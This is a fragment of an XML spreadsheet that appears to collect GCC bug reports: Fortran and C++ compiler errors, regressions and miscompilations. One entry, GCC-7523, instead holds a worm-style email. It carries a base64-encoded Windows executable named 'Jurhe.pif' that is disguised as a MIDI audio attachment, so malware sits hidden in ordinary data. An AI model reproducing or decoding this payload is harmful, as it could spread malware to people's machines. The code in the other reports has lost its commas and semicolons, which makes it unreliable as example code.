    <t>GCC-45507</t>
  </si>
  <si>
    <t>[4.6 Regression] Bogus Error: Can't convert TYPE(c_ptr) to INTEGER(4)</t>
  </si>
  <si>
    <t>Reported at http://gcc.gnu.org/ml/fortran/2010-09/msg00061.html
Working: 163780 / 163718
Failing: 163661 / 163773
Error: Can't convert TYPE(c_ptr) to INTEGER(4)
module filter
  use intrinsic :: iso_c_binding
  type :: cType
     type(c_ptr) :: accelPtr = c_null_ptr
  end type cType
  type filterType
     type(cType) :: accel
  end type filterType
  type(filterType) allocatable dimension(:) :: filters
contains
  subroutine load()
    allocate(filters(1))
    return
  end subroutine load
end module filter</t>
  </si>
  <si>
    <t>GCC-54993</t>
  </si>
  <si>
    <t>[4.8 regression] PIC register not marked as live</t>
  </si>
  <si>
    <t>Created attachment 28496
preprocessed from libstdc++-v3/testsuite/30_threads/future/members/wait.cc
The patch for bug 38711 is causing the PIC register not being marked as live.
Compiled with -O2 -std=gnu++0x.
@@ -166817 +166316 @@
        .cfi_startproc
        .cfi_personality 0__gxx_personality_v0
        .cfi_lsda 0.LLSDA2633
-       link.w %fp#-72
+       link.w %fp#-68
        .cfi_offset 14 -8
        .cfi_def_cfa 14 8
        movem.l #12348-(%sp)
-       .cfi_offset 2 -104
-       .cfi_offset 3 -100
-       .cfi_offset 10 -96
-       .cfi_offset 11 -92
-       .cfi_offset 12 -88
-       .cfi_offset 13 -84
-       lea (%pc _GLOBAL_OFFSET_TABLE_@GOTPC) %a5
+       .cfi_offset 2 -100
+       .cfi_offset 3 -96
+       .cfi_offset 10 -92
+       .cfi_offset 11 -88
+       .cfi_offset 12 -84
+       .cfi_offset 13 -80
        clr.l -48(%fp)
        clr.l -44(%fp)
        pea 104.w</t>
  </si>
  <si>
    <t>GCC-68560</t>
  </si>
  <si>
    <t>[6/7/8 Regression] The test gfortran.dg/shape_8.f90 now fails when compiled with -flto</t>
  </si>
  <si>
    <t>The test gfortran.dg/shape_8.f90 now (between r230703 and r230726) fails when compiled with -flto
/opt/gcc/_clean/gcc/testsuite/gfortran.dg/shape_8.f90:10:0: warning: type of '_gfortran_shape_4' does not match original declaration [-Wlto-type-mismatch]
    if (any(shape(x) /= [ 2 5 ])) call abort
/opt/gcc/_clean/gcc/testsuite/gfortran.dg/shape_8.f90:13:0: note: type mismatch in parameter 3
    if (any(shape(xkind=4) /= [ 2 5 ])) call abort
/opt/gcc/_clean/gcc/testsuite/gfortran.dg/shape_8.f90:13:0: note: '_gfortran_shape_4' was previously declared here
i.e. the 'kind' argument is not understood as optional (it could be related to pr46846).</t>
  </si>
  <si>
    <t>GCC-4526</t>
  </si>
  <si>
    <t>ICE in g++ when using typeof() as template parameter</t>
  </si>
  <si>
    <t>G++ 3.0.1 doesn't like the use of typeof() to give a
type parameter to a template structure.
Given the following code:
template
struct get_begin
{
  typedef typename T::iterator iterator
  static iterator begin(T&amp; c)
  {
    return c.begin()
  }
}
template
struct something_t
{
  typedef T some_container
  void doit(void)
  {
    some_container a
    typedef get_begin my_get_begin // here is the problem
    typename my_get_begin::iterator i
  }
}
then G++ 3.0.1 will choke on instanciation of something_t like in the
following code :
#include 
int main(void)
{
 something_t &gt; something
}
The error message is :
e.cc: In instantiation of `get_begin':
e.cc:19:   instantiated from here
e.cc:4: Internal error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.1
Environment:
System: SunOS merlin 5.8 Generic_108528-03 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../configure --prefix=~/gcc --enable-languages=cc++ : (reconfigured) ../configure --prefix=/infres/ir30/infstag/poss/gcc --enable-languages=cc++
How-To-Repeat:
# 1 e.cc
template
struct get_begin
{
  typedef typename T::iterator iterator
  static iterator begin(T&amp; c)
  {
    return c.begin()
  }
}
template
struct something_t
{
  typedef T some_container
  void doit(void)
  {
    some_container a
    typedef get_begin my_get_begin
    typename my_get_begin::iterator i
  }
}
// inclusion of  stripped
# 24 e.cc 2
int main(void)
{
 something_t &gt; something
}</t>
  </si>
  <si>
    <t>grey.havens</t>
  </si>
  <si>
    <t>GCC-38721</t>
  </si>
  <si>
    <t>[alias-improvements] vectorizer miscompiles gfortran.fortran-torture/execute/elemental.f90 at -O3</t>
  </si>
  <si>
    <t>The vectorizer miscompiles gfortran.fortran-torture/execute/elemental.f90 at -O3
on x86-64-unknown-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-34302</t>
  </si>
  <si>
    <t>[4.3 regression] Invalid code reordering</t>
  </si>
  <si>
    <t>((c_addr)=(Char *)(sp[2]))
((u1)=(UCell)(sp[1]))
((wfileid)=(Cell)((sp[0])))
sp += -1
{
struct Cellquad r = read_line(c_addr u1 wfileid)
	lwz 60(19)	 #* sp wfileid         ((wfileid)=(Cell)((sp[0])))
	addi 1919-4	 # sp sp              sp += -1
	mr 2919	 # temp.1416 sp
	mr 2819	 # temp.1418 sp
	addi 3172	 #
	lwzu 48(29)	 #                     ((c_addr)=(Char *)(sp[2]))
	lwzu 54(28)	 #                     ((u1)=(UCell)(sp[1]))
	bl read_line	 #</t>
  </si>
  <si>
    <t>GCC-69609</t>
  </si>
  <si>
    <t>block reordering consumes an inordinate amount of time REE consumes much memory</t>
  </si>
  <si>
    <t>Created attachment 37545
gzipped C source code
The attached code when compiled by trunk gcc 6.0.0
with flag -O2 seems to take about 17 minutes.
gcc 5.3.1 seems to take about 16 minutes for the same code.
In a private email Jeffery Law says: 
&gt;I do note that test is spending most of its time (90%) in block
&gt;reordering so you might want to go ahead and file it</t>
  </si>
  <si>
    <t>GCC-29806</t>
  </si>
  <si>
    <t>Error if CONTAINS is present without SUBPROGRAM</t>
  </si>
  <si>
    <t>The following is invalid Fortran as an internal-subprogram (R1101R210) or module-subprogram (R1107) is needed with CONTAINS.
module x
 contains
end module x
program y
  contains
end program y</t>
  </si>
  <si>
    <t>GCC-70564</t>
  </si>
  <si>
    <t>Problem with std::experimental::not_fn</t>
  </si>
  <si>
    <t>Hi all. The following code does not compile under MinGW-64 GCC 5.2.0 / Linux-64 GCC 5.3.1:
#include 
#include 
int main( )
{
   auto lambda = [](auto i) {
      return i == 5
   }
   std::array arr
   std::find_if(arr.begin( ) arr.end( ) std::experimental::not_fn(lambda))
}
Inside std::find_if an object of the _Iter_Pred class is created:
      _Iter_pred(_Predicate __pred)
        : _M_pred(__pred)
      { }
which calls _Not_fn(_Not_fn&amp;) since __pred is an lvalue. However between these _Not_fn constructors:
      template
        explicit
        _Not_fn(_Fn2&amp;&amp; __fn) : _M_fn(std::forward(__fn)) { }
        _Not_fn(const _Not_fn
        _Not_fn(_Not_fn
the first one wins and triggers an error.</t>
  </si>
  <si>
    <t>rcc.dark</t>
  </si>
  <si>
    <t>GCC-7523</t>
  </si>
  <si>
    <t>Position</t>
  </si>
  <si>
    <t xml:space="preserve"> --Cj2dD008hY9i7C46D04a2651Ue
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --Cj2dD008hY9i7C46D04a2651Ue
 Content-Type: audio/x-midi
 	name=Jurhe.pif
 Content-Transfer-Encoding: base64
 Content-ID: 
 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
 RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
 GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
 UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
 QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
 ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
 AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
 QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
 AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAAB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FWL7IPsFItF
 EFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV9H0DiUX0i030uD09PT2Nffxm
 q4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOkik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UM
 K0X4mff/hdJ1G8YEMw1DxgQzCkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDwQACA4QPA4QSK
 BBCIBDOKRf2K0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L
 FTDwQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF+Jn3/4XSdQ7G
 BDMNQ8YEMwpDg0X4Ag+2Rf+LFTDwQACKBBCIBDNDg330An8FxkQz/z2A4T+F23Qehf9+GovD
 K0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bBiw0w8EAAigQIiAQzQ4N99AF/BcZEM/89i3Xs
 g8YDg23wA4l17OmI/v//X4vDXlvJw1WL7IHsEAEAAINl+ACNRfxQagRoUgJBAOjJIgAAWVlQ
 aAIAAID/FUzQQACFwA+FtwAAAFNWV7uLCUEAUFPo1CIAAFmJRfRZjYXw/v//aAQBAABQ/3X4
 /3X8/xVQ0EAAhcB1e42F8P7//1DowbUAADP/WTl99H5fV1PoaCIAAFCNhfD+//9Q6GUqAACD
 xBCFwHQ+aJMLQQD/FfTQQACL8IX2dC1qAmiTDEEA6DciAABZWVBW/xU40UAAhcB0DI2N8P7/
 /1H/dfz/0Fb/FfDQQABHO330fKH/Rfjpaf////91/P8VXNBAAF9eW8nDVYvsgewUCAAAjUUM
 VoNl/ABQ/3UMvgAEAACJdfSJdfj/dQj/FUzQQACFwHQHM8Dp7AAAAFNXv4sJQQBqAFfo5yEA
 AFmJRQhZjUX4M9tQjYXs9///UI1F8FCNRfRTUI2F7Pv//4l19FCJdfj/dfz/dQz/FUTQQACF
 wA+FlAAAAIN98AF0BiCF7Pf//42F7Pv//1DorbQAAI2F7Pf//1DoobQAAIN9CABZWX5gU1fo
 SCEAAIlF7FCNhez7//9Q6EIpAACDxBCFwHUs/3XsjYXs9///UOgsKQAAWYXAWXUXjYXs+///
 aDTwQABQ6O1iAABZhcBZdRCNhez7//9Q/3UM/xVU0EAAQztdCHyg/0X86TX/////dQz/FVzQ
 QABfM8BbXsnCCABVi+yB7AACAABW6OD9//+NhQD+//9qAlDoHSkAAFmNhQD+//9ZvgIAAIBQ
 Vuiq/v//jYUA/v//agZQ6PsoAABZjYUA/v//WVBW6I3+//9eycNVi+yB7EQEAABTaMDwQADo
 MmQAADPbxwQkBA5BAFOJRezoKUAAAFNoxQtBAOiDIAAAg8QQiUX8jYW8+///aAQBAABQU/8V
 FNFAAP91CMeFwPz//yQCAABqCOjsYQAAjY3A/P//iUXoUVDo1mEAAIXAD4R/AQAAjYXg/f//
 UI2F5P7//1DozWIAAI2F5P7//1CNhbz7//9Q6Iq0AACDxBCFwA+ETgEAAP+1yPz//1No/w8f
 AP8VINFAADvDiUX0D4QxAQAAVr4AAAgAV1a/0DFBAFNX6B5iAACLhdj8//+DxAw7xnICi8Y5
 XQyJXfh1HY1N+FFQV/+11Pz///919P8VGNFAAIXAD4TbAAAAOV38iV0ID4bPAAAA/3UIaMUL
 QQDoXx8AAFCJRfDoGGMAADP2g8QMOXUMi9h0CI1DbolF+OsDi0X4K8OD6AoPhIgAAAD/deyN
 vtAxQQBXaMDwQADoErMAAIPEDIXAdGaDfQwAdSBTV/918Oj7sgAAg8QMhcB0D4tF+EYrw4Po
 CjvwcsHrR2oA/3X0/xUo0UAAajL/FSzRQABqAWjwDUEA6NQeAABQjYXk/v//UOjRJgAAg8QQ
 hcB1DY2F5P7//1DoOykAAFmLRfxAiUUI/0UIi0UIO0X8D4Ix/////3X0/xUk0UAAagFbX17/
 dej/FSTRQACLw1vJwggAVYvsgew4AgAAU1ZXal9eM9tTaIsJQQDokx4AAFmJRfxZjUYBamSZ
 Wff5agpZi8KJRfiZ9/mF0nUF6Gz9//9TagLHhcz+//8oAQAA6PVfAACNjcz+//+JRfRRUOjx
 XwAAhcAPhKcAAACNhcj9//9TUFONhfD+//9TUOg+YgAAjYXI/f//UOg/sQAAg8QYOV34dQxT
 /7XU/v//6F39//8z/zP2OV38fk5WaIsJQQDozR0AAFCNhcj9//9Q6GKyAACDxBCFwHUli0X8
 SDvwdQg5HQA5SQB0FWoBX1f/tdT+///oFv3//4k9PBNBAEY7dfx8tjv7dQaJHTwTQQCNhcz+
 //9Q/3X06EFfAADpUf////919P8VJNFAADkd8DhJAHQcaOQ1SQBo3DNJAGjgNEkAaAIAAIDo
 Ey8AAIPEEGpk/xUs0UAAi3X46dX+//+LwcNVi+xRUVNWV2oCWovxagQz/zl9EFm4AAAAgIva
 iU34iX38iT6JfgSJfgh1CrgAAADAi9mJVfg5fQh0NVdqIGoDV2oBUP91CP8V/NBAAIP4/4kG
 dF2NTfxRUP8V7NBAADl9/IlGDHUdi00MO890AokBV1dXU1f/Nv8VBNFAADvHiUYEdQr/Nv8V
 JNFAAOsjV1dX/3X4UP8VCNFAADvHiUYIdRH/dgSLPSTRQAD/1/82/9czwF9eW8nCDABWi/FX
 i0YIhcB0B1D/FfjQQACLRgSLPSTRQACFwHQDUP/XiwaFwHQDUP/XgyYAg2YEAINmCABfXsNT
 Vot0JAwz21dT6GYvAACD4AFqB4mGHAkAAGomjYa4CAAAagpQ6MQeAACDxBQ4Heg2SQB0E42G
 tAcAAGjoNkkAUOjJXgAAWVlW6I8BAAAPvoYsAQAAjb4sAQAAUOhgYQAAOJ6sAQAAWVmIB3UK
 x4YcCQAAAQAAADiesAYAAI2+sAYAAHUfagH/tiAJAABo3AFBAOimGwAAWVlQU1fofykAAIPE
 EF9eW8NVi+yD7BxTVo1F5FdQ/xXY0EAAM9u+5gZBAFNW6KQbAABZO8NZiUX0D44AAQAAvxjS
 QAAzwIH/KNJAAA+dwEiLD4PgColN/IPABYlN+PfYUI1F/FDoMzIAAFlZZotN+GY5Tfx+CWaD
 wQxmg0X6Hg+3ReYPv1X8O9B/HQ+/yTvBfxYPt0XqD79N/jvIfwoPv036QUE7wX4JQ4PHBDtd
 9HyTO130D42FAAAAU1bo5RoAAGoAi9joFC4AAIvwi0UIg+YBVmhmB0EAjbgsAQAA6MMaAABQ
 V+iOXQAAagDo7S0AAIPEIDPSagNZ9/GF0nQEhfZ0LmoA6NQtAABqBjPSWffxUmikA0EA6Ioa
 AABQV+hlXQAAaDjwQABX6FpdAACDxBxTV+hQXQAAWVlqAVjrAjPAX15bycNVi+yB7AgMAABT
 Vot1CI2F+Pf//1dQjYX48///M9tQjUZkUIld/Iid+PP//+hpIQAAjYasAQAAU4lF+GjcAUEA
 iBiNhiwBAACInVz0//+Infj7//+JRQiIGIiesAYAAOgsGgAAU4v46CwtAAAz0lP394mWIAkA
 AOgcLQAAg8QcqAN1D1boQv7//4XAWQ+FTQMAAFPoAC0AAFkz0moYWffxhdJ1LGi0DkEAiZ4c
 CQAA/3UI6HtcAACBxsgAAABWaMoOQQD/dfjosGAAAOkMAwAAU+jCLAAAWTPSahhZ9/GF0g+F
 pwAAAMdF/AEAAABT6KUsAABZM9JqA1n38YXSD4TxAQAAOV38D4XoAQAAv/IDQQBTV+h4GQAA
 U4lF+Oh3LAAAM9L3dfhSV+gzGQAAU4v46GMsAACDxBgz0moDWffxhdIPhZ0BAABT6EssAABZ
 M9JqCln38YXSD4UnAQAAV1PoNCwAAIPgAYPABFBoEANBAOjrGAAAg8QMUP91COj6XwAAV1bo
 ZgYAAOlPAgAAU+gFLAAAqB9ZdQpoOPBAAOlDAQAAU+jwKwAAqAFZD4U8////OB3sN0kAD4Qw
 ////agFqMo2F+Pv//2oIv+w3SQBQV+hcHgAAg8QUhcAPhA3///9Tx4YcCQAAAQAAAOioKwAA
 WTPSagqInfj3//9Z9/GNhfj7//9QO9N1L1PoiSsAAIPgAYPABFBoEANBAOhAGAAAg8QMUP91
 COhPXwAAjYX4+///UOlK/////3UI6PJaAABT6FIrAACDxAyoPw+FjgEAAGoBaCADAACNhfj3
 //9qCFBXiJ349///6MQdAACNhfj3//9Q/3X46LZaAACDxBzpWwEAAFPoDisAAIPgA1BoEANB
 AOjIFwAAi3UIUFbokFoAAFPo8CoAAIPEGKgBdBuNhfjz//9QVuiGWgAAaDzwQABW6HtaAACD
 xBAPvgdQ6N1dAABXVogH6GZaAACDxAzp+wAAAFf/dQjoRVoAAFlZ6esAAABT6J4qAABZM9Jq
 BVn38Tld/Iv6dAIz/4sEvfDRQABTiUX8iwS9BNJAAIlF+OhzKgAAM9JZ93X4AVX8g/8EfWNT
 6F8qAACoAVl1I4P/A3QeU+hPKgAAg+ABg8AIUGioBUEA6AYXAACDxAyL2OsFu6AxQQD/dfxo
 pANBAOjtFgAAWVlQU1doVANBAOjeFgAAWVlQjYX4+///UOjqXQAAg8QQ6y3/dfxopANBAOi9
 FgAAWVlQV2hUA0EA6K8WAABZWVCNhfj7//9Q6LtdAACDxAyNhfj7//9Q/3UI6GBZAAD/dfxX
 VugIAAAAg8QUX15bycNVi+yB7GACAACDfQwEU1ZXD4SZAQAAM9tT6JYpAACoAVm+qAVBAHUg
 g30MA3QaU+iAKQAAg+ABg8AIUFboOxYAAIPEDIv46wW/oDFBAP91EGikA0EA6CIWAABZWVBX
 /3UMaFQDQQDoERYAAFlZUI2FaP7//1DoHV0AAFPoNCkAAIPgAYPAEFBW6O8VAACDxBxQU+gd
 KQAAagMz0ln38YPCElJW6NQVAACDxAxQag9W6MgVAABZWVCNhTD///9Q6NRcAABT6OsoAACD
 xBSoAXUmU+jeKAAAg+ABUGgQA0EA6JgVAABQi0UIBawBAABQ6FtYAACDxBSLRQhqDlaNuKwB
 AACJfRDochUAAFBX6E1YAACNhWj+//9QV+hAWAAAg8QYOV0Mv3YHQQB1ZFf/dRDoKlgAAGgz
 CUEA/3UQ6B1YAACLdQhTaHQNQQCJnhwJAACJniAJAADoURUAAFOJRfyBxrAGAADoSigAADPS
 93X8Umh0DUEA6AIVAABQVujNVwAAaNwBQQBW6NJXAACDxDRX/3UQ6MZXAACNhTD///9Q/3UQ
 6LdXAACDxBDpVgIAADPbU+j9JwAAg+ABvlgFQQCJRfyLRQhTVomYHAkAAImYIAkAAOjUFAAA
 U4v46NQnAAAz0vf3UlbokRQAAIlF+FCNhWj+//9Q6FNXAABT6LMnAACDxCS+qAVBAKgBdAnH
 RQygMUEA6xlT6JgnAACD4AGDwAhQVuhTFAAAg8QMiUUM/3UMagRW6EIUAABZWVCNhTD///9Q
 6E5bAACNhTD///9QjYVo/v//UOgCVwAAi30QV2ikA0EA6BIUAACDxByJRRBQagRoVANBAOj/
 EwAAWVlQjYUw////UOgLWwAAjYUw////UI2FaP7//1Dov1YAAP91EI2FMP///1DooFYAACs9
 ANJAAIPHBldW6L4TAACDxCRQ/3UMagVW6K8TAABZWVCNhaD9//9Q6LtaAACNhaD9//9QjYUw
 ////UOhvVgAAi0UIg8QYOV38dC6NjWj+//8FrAEAAFFQ6EJWAACLRQi/dgdBAAWsAQAAV1Do
 PlYAAI2FMP///+ssjY0w////BawBAABRUOgUVgAAi0UIv3YHQQAFrAEAAFdQ6BBWAACNhWj+
 //9Qi0UIBawBAABQ6PtVAACLRQiDxBgFrAEAAFdQ6OlVAACLRQhXjbisAQAAV+jZVQAAag1W
 6O8SAABQV+jKVQAAagpW6OASAABQV+i7VQAAagtW6NESAABQV+isVQAAg8RA/3X4V+igVQAA
 agxW6LYSAABQV+iRVQAAi0UIU4mYHAkAAI2wsAYAAOjSJQAAg+ABUGh0DUEA6IwSAABQVuhX
 VQAAaNwBQQBW6FxVAACDxDRfXlvJw4PsZFOLXCRsVVaNq8gAAABXjbOsAQAAVWioBUEAVuhq
 WQAAv3YHQQBXVuglVQAAV1boHlUAAGiQBUEAVugTVQAAjUNkUFboCVUAAFdW6AJVAABqAWiQ
 BUEA6BQSAABQVujvVAAAg8REVVbo5VQAAFdW6N5UAABqAmiQBUEA6PARAABQVujLVAAA/7Qk
 nAAAAFbovlQAAFdW6LdUAABqAOgGJQAAg+ABv6gFQQBAUFfovhEAAFBW6JlUAACDxERqA1fo
 rBEAAFBW6IdUAACNRCQgUI1DZGoAUOjPGAAAagFofQdBAOiJEQAAUFXoVFQAAI1EJDxQVehZ
 VAAAg8Q0g6McCQAAAF9eXVuDxGTDVYvsgexoCAAAU1ZXi30MaJAFQQBX6B1UAACLXQiNhZj3
 //9QjYWY+///jbPIAAAAUFboaBgAAI2FmPv//1ZQjYWY9///aCsNQQBQ6DBYAACNhZj3//9Q
 V+jqUwAAvn0HQQBWV+jeUwAAagFokAVBAOjwEAAAUFfoy1MAAIPERI1DZFBX6L5TAABWV+i3
 UwAAagJokAVBAOjJEAAAUFfopFMAAI2DLAEAAFBX6JdTAABWV+iQUwAAaJ0HQQBX6IVTAACN
 g7gIAABQV4lFDOh1UwAAg8RAVlfoa1MAAFZX6GRTAABqB2oUjUWYaghQ6CQTAABqAf91DFfo
 NQIAAIPELIO7HAkAAACLxnQejUWYUI2FmPf//2j7CEEAUOhgVwAAg8QMjYWY9///UI2FmPv/
 /2jhB0EAUOhFVwAAjYWY+///UFfo/1IAAI2DrAEAAFBX6PJSAABoTwhBAFfo51IAAFZX6OBS
 AABWV+jZUgAAagDoKCMAAIPEOIPgAYO7HAkAAACJRQh1B8dFCAIAAABqAf91DFfomQEAAIPE
 DI1FmFCNg7AGAABQ/3UIaMEIQQDosQ8AAFlZUI2FmPv//2hnCEEAUOi4VgAAjYWY+///UFfo
 clIAAFZX6GtSAABWV+hkUgAAjUX8agFQjYOsBQAAUOi6HAAAg8Q4iUUIhcB0ElBX6EFSAAD/
 dQjoxFYAAIPEDFZX6C9SAACBw7QHAABZWYA7AA+E6wAAAFPozhgAAD0AyAAAWYlF/HIbPQDQ
 BwAPg88AAABqAOhRIgAAqAFZD4S/AAAAjUX8agBQU+hOHAAAg8QMiUUIhcAPhKUAAABqAf91
 DFfouAAAAGoB/3UMV+itAAAAjYWY+///UI2FmPf//1BqAGoAU+gFUwAAjYWY+///UI2FmPf/
 /1Dol1EAAIPENI1FmFCNhZj3//9QagJowQhBAOibDgAAWVlQjYWY+///aGcIQQBQ6KJVAACN
 hZj7//9QV+hcUQAAVlfoVVEAAFZX6E5RAAD/dQhX6EVRAABWV+g+UQAA/3UI6MFVAACDxEBq
 AP91DFfoEwAAAGhA8EAAV+gdUQAAg8QUX15bycNVi+xoQPBAAP91COgFUQAA/3UM/3UI6PpQ
 AACDxBCDfRAAdA9ofQdBAP91COjkUAAAWVldw1WL7IPsMFNWV/8V1NBAAIt9CDPbUFNo/w8f
 AIld8MdF9DIAAACJXfiIXdiIXdmIXdqIXduIXdzGRd0FiV3oiV3siV38iV3kiR//FSDRQACN
 TfCJReBRaghQ/xUg0EAAhcB1Dv8V4NBAAIlF/OkSAQAA/3X0U/8VlNBAADvDiUX4dOGNTfRR
 /3X0UGoC/3Xw/xUw0EAAizXg0EAAhcB1OP/Wg/h6dWv/dfj/FdzQQAD/dfRT/xWU0EAAO8OJ
 Rfh0UY1N9FH/dfRQagL/dfD/FTDQQACFwHQ6jUXoUFNTU1NTU1NqBI1F2GoBUP8VKNBAAIXA
 dB2NRexQU1NTU1NTU2oGjUXYagFQ/xUo0EAAhcB1B//W6VH///+LdfiJXQg5HnZSg8YE/3Xo
 iwaLTgSJRdBQiU3U/xUs0EAAhcB1Iv917P910P8VLNBAAIXAdR3/RQiLRfiLTQiDxgg7CHLH
 6xTHReQBAAAAiR/rCccHAQAAAIld5DkfdQs5XeR1BscHAQAAADld7Is1PNBAAHQF/3Xs/9Y5
 Xeh0Bf916P/WOV34dAn/dfj/FdzQQAA5XfCLNSTRQAB0Bf918P/WOV3gdAX/deD/1otF/F9e
 W8nDVYvsuOAtAADoBlcAAFMz2zldEFZXx0X8IAAAAIideP///3QT/3UQjYV4////UOjQTgAA
 WVnrFWoHagqNhXj///9qBVDomQ4AAIPEEDldGHQF/3UY6wVo5DVJAI2FePr//1DonE4AAIt1
 CFlZjYV0/v//VlDoik4AAP91DI2FdP7//1Doi04AAIPEEDldFHQT/3UUjYVw/f//UOhkTgAA
 WVnrImoBaNwBQQDoQ1YAAGoCmVn3+Y2FcP3//1JQ6FIZAACDxBA5HfA4SQB0HmoBU+gdVgAA
 agKZWff5jYVw/f//UlDoLBkAAIPEEI2FdP7//1Do/E4AAIC8BXP+//9cjYQFc/7//1l1AogY
 gL1w/f//XHQTjYV0/v//aETwQABQ6O5NAABZWY2FcP3//1CNhXT+//9Q6NlNAABZjYV0/v//
 WVNQjYV4+v//UP8VfNBAAIXAD4RlAQAA6JRVAABqBZlZ9/mF0nQi6IVVAACZuQAoAAD3+Y2F
 dP7//4HCgFABAFJQ6JkWAABZWWh6IgAAjYUg0v//aMDwQABQ6BNSAACNhSDS//+InTTi//9Q
 jYV0/v//UOj/LAAAjYV0/v//UOgQKwAAg8QYOR3wOEkAD4XqAAAAjUX8UI1F3FD/FWTQQACN
 RdxQjUYCUOjkngAAWYXAWQ+ExQAAAGoCU1aLNQDQQAD/1ov4O/t1CTldHA+EqgAAAFNTU1ON
 hXT+//9TUFNqA2gQAQAAjYV4////U1CNhXj///9QV/8VSNBAAFeLPUDQQAD/12oBU/91CP/W
 i/CNhXj///9qEFBW/xU40EAAU1NQiUUQ/xUk0EAA/3UQiUUY/9dW/9c5XRgPhWUBAAC6gQAA
 ADPAi8qNvab2//9miZ2k9v//ZomdnPT///OrZquLyjPAjb2e9P//OR0EOUkA86uJXRCJXRhm
 q3UHM8DpJAEAAItFDIA4XHUHx0UYAQAAAL8EAQAAjYWk9v//V4s1eNBAAFBq//91CGoBU//W
 i00MjYWc9P//V1CLRRhq/wPBUGoBU//WjUUQUI2FnPT//2oCUI2FpPb//1D/FQQ5SQCFwA+F
 uwAAAFNTjYV8+///V1CLRRBq/4idfPv///9wGFNT/xWg0EAAjUUUUGgCAACA/3UI/xUc0EAA
 hcB1d42FrPj//2oDUOgnEQAAjYV8+///aETwQABQ6JNLAACNhXD9//9QjYV8+///UOiASwAA
 jYV0+f//U1BTjYV8+///U1CInXT5///ov0wAAI2FfPv//1CNhXT5//9QjYWs+P//UP91FOgy
 GgAAg8Q8/3UU/xVc0EAAoQw5SQA7w3QF/3UQ/9BqAVhfXlvJw1WL7ItFFFNWi/FXM9v/dQiJ
 RhiNRhyJHlCJXgzo9EoAAIt9EGaLRQxXZomGnAEAAGbHhp4BAAAZAOgWUwAAg8QMO8OJRgR1
 DMeGpAEAAAIAAIDrY1fo+lIAADvDWYlGEHTmV1P/dgSJfgiJfhToQ0oAAFdT/3YQ6DlKAACD
 xBiNjqABAACJnqQBAACJnqgBAABqAWoB/3UMiZ6sAQAAiJ4cAQAA6D4FAACFwHUOx4akAQAA
 BQAAgDPA6xA5Xgx0CDkedARqAesCagJYX15bXcIQAFaL8VeLRgSFwHQHUOjNTgAAWYtGEIXA
 dAdQ6L9OAABZjb6gAQAAagBqBmhI8EAAi8/ojAUAAIvP6MEFAACFwHT1g/gBdRBo3QAAAIvO
 6NUCAACL8OsDagFei8/okAUAAIvGX17DVovxV2aLhpwBAACNvqABAABQjUYcUIvP6N0EAACF
 wHUNuAEAAICJhqQBAADrK4vP6GQFAACFwHT1g/gBdQ5o3AAAAIvO6HgCAADrDWoBx4akAQAA
 AwAAgFhfXsNVi+yB7AQBAABTVovxV42GHAEAAFCNhfz+//9oYPBAAFDopU0AAIPEDI2F/P7/
 /42+oAEAAGoAUOg1SgAAWVCNhfz+//9Qi8/otAQAAIvP6OkEAACFwHT1g/gBD4WdAAAAu/oA
 AACLzlPo+AEAAIXAD4WVAAAAi87olQAAAIXAD4WGAAAAIUX8OQaLfgR2IVeLzug1AQAAhcB1
 cFfo0UkAAP9F/I18BwGLRfxZOwZy32oAjb6gAQAAagdoWPBAAIvP6DsEAABoYgEAAIvO6JQB
 AACFwHU1UIvP/3UM/3UI6B0EAABqAGoFaFDwQACLz+gNBAAAU4vO6GoBAADrDWoBx4akAQAA
 AwAAgFhfXlvJwggAU1aL8YtGFIPAZFDon1AAAIvYWYXbdQhqAljpmAAAAFVXaHDwQABT6ERI
 AACLfhAz7TluDFlZdiVXU+hBSAAAaDjwQABT6DZIAABX6BBJAACDxBRFO24MjXwHAXLbaGzw
 QABT6BhIAABZjb6gAQAAWWoAU+joSAAAWVBTi8/obQMAAIvP6KIDAACL6IXtdPNT6HZMAABZ
 agFYXzvoXXUOaPoAAACLzuipAAAA6wrHhqQBAAADAACAXlvDU1b/dCQMi9nomUgAAIPAZFDo
 308AAIvwWYX2WXUFagJY63JVV2iA8EAAVuiGRwAA/3QkHFbojEcAAGhs8EAAVuiBRwAAg8QY
